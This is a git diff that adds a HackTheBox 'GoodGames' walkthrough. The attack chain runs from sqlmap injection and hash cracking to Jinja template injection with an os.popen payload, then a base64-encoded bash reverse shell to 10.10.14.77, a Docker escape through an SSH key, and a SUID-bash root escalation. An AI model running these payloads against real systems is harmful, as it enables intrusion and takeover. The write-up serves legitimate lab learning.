diff --git a/HackTheBox/GoodGame.md b/HackTheBox/GoodGame.md
new file mode 100644
index 0000000..2868e0a
--- /dev/null
+++ b/HackTheBox/GoodGame.md
@@ -0,0 +1,192 @@
+# HackTheBox - GoodGames
+
+## NMAP
+
+```bash
+PORT STATE SERVICE VERSION
+80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
+|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
+| http-methods:
+|_ Supported Methods: GET HEAD OPTIONS POST
+|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
+|_http-title: GoodGames | Community and Store
+
+```
+
+## PORT 80 (HTTP)
+
+Visting port 80 it shows us about a gaming page where it lists the current games
+
+
+
+
+
+But it's just a static page where these links won't lead to anywhere , there's a page to a store which says that it will be available soon
+
+
+
+There's a login page but it asks for an email address so I left this form , and went with signing up a user
+
+
+
+
+
+
+
+After creating a user we can login on the site
+
+
+
+With the password reset , I tried to see if it was taking a user name in the parameters
+
+
+
+
+
+It wasn't taking any username so taking a step back on the login page
+
+
+
+We can't perform sqli like this as it's matching the format of an email address so , I intercepted the request with burp and save the request , after that ran `sqlmap`
+
+
+
+
+
+This shows that it's vulnerable to sqli , so let's just dump the database.
+
+
+
+Being a time based sqli , it was taking some time to dump the data , so we only want the users table so let's just dump that
+
+```bash
+sqlmap -r sql --batch -D main -T user --dump
+```
+
+
+
+We can then just skip the rest of the data as we only needed the admin hash, using crackstation to crack hash we can get the password `superadministrator`
+
+
+
+So logging with the admin credentials
+
+
+
+On becoming admin , we can see another options which would take us to `internal-administration.goodgames.htb`
+
+
+
+
+
+This brings us another login page for `Flask Volt`
+
+
+
+I looked if there were any default credentials for this but it seems that it's just a template on github for flask applications login page and being a flask application it might be vulnerable to one of the common attacks which is Server Side Template Injection `SSTI` maybe as this is the first thing that I would look at
+
+
+
+
+
+So now let's look for an input field where we can test for SSTI payloads
+
+
+
+Setting page has an input field for username , so testing with payload `{{7*7}}` it should return the result 49
+
+
+
+It did now we need to find which template engine it's using , to do that we can check with payload `{{7*'7'}}` , if it still returns the result 49 that means it's using `twig` or if it returns 7777777 then it's using `jinja`
+
+
+
+So it's jinja , now we need to look for payload to get command execution
+
+```bash
+{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
+```
+Using this payload we can execute shell commands
+
+
+
+This returns as a root user , normally you would get a low privleged user like `www-data` or some other user could be that this application is hosted in a docker container , using bash reverse shell we can get a shell by first convert the reverse shell payload to base64
+
+
+
+```bash
+ echo "bash -i >& /dev/tcp/10.10.14.77/2222 0>&1" | base64
+
+```
+
+```bash
+{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43Ny8yMjIyIDA+JjEK" |base64 -d| bash').read() }}
+```
+
+
+
+
+
+Running `ifconfig`
+
+
+
+This IP address tells that we are indeed inside in a container , running `df -h` to see disk space we can see a directory `/home/augustus` from `/dev/sda1` as this user doesn't exist on this docker container this probably mounted from the host machine
+
+
+
+
+
+So here I thought of adding an ssh for `augustus` by creating a `.ssh` folder and adding the public key in `authorized_keys` file
+
+
+
+And then changing the owner of that folder to `augustus`
+
+
+
+But the host machine didn't had ssh service running when we ran nmap , could be that it's open locally or we can access it from the container
+
+
+
+We can't , we know that this container's IP address is `172.19.0.2` and whenever we run a docker container on a host machine that machine becomes a gateway and the IP is assigned to `172.19.0.1`
+
+Let's verify this by transferring a static binary of nmap
+
+
+
+
+
+This shows that port 80 and 22 is open , so let's give it a shot
+
+
+
+And we are on the host machine now
+
+
+
+Running `sudo -l` to see what permissions we have but there's no sudo binary
+
+
+
+ So going back again , we saw that we can change permissions in augustus's folder ,so let's just create a file and see if it gets reflected with the room permissions
+
+ 
+
+ Logging back again , we see that the file has root permissions , so we can just copy bash , make it a SUID and run it on the host machine
+
+ 
+
+ 
+
+ But it didn't ran and started screaming about a library file so I transferred my host machine's bash file on the docker container , made that a SUID again and then tried running the binary and it worked
+
+ 
+
+ 
+
+
+
+## References
+
+- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection